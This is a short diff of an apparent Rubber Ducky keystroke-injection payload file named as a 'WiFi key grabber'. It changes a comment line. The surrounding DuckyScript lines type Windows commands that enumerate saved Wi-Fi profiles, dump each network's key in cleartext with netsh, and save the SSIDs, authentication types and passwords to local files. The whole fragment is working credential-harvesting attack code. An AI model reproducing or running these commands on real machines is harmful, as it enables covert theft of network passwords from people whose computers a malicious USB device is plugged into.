abhinavvv03/Rubber-Duckey/Payload---WiFi-key-grabber.md

 STRING for /f "tokens=1 delims= "  %a in (a) do echo %a>>b ENTER
 REM --> Get info for each SSID
-REM FIX THIS: Authentication is duplicated
+REM Did not refine information further because it wouldn't be in the right order REM FIX THIS: Authentication is duplicated
 STRING del a & for /f "tokens=*"  %a in (b) do (netsh wlan show profiles "%a"  key=clear|findstr /c:"Network type"  /c:" Authentication"  /c:"Key Content"|findstr /v "broadcast"| findstr /v "Radio">>%a.x)
 ENTER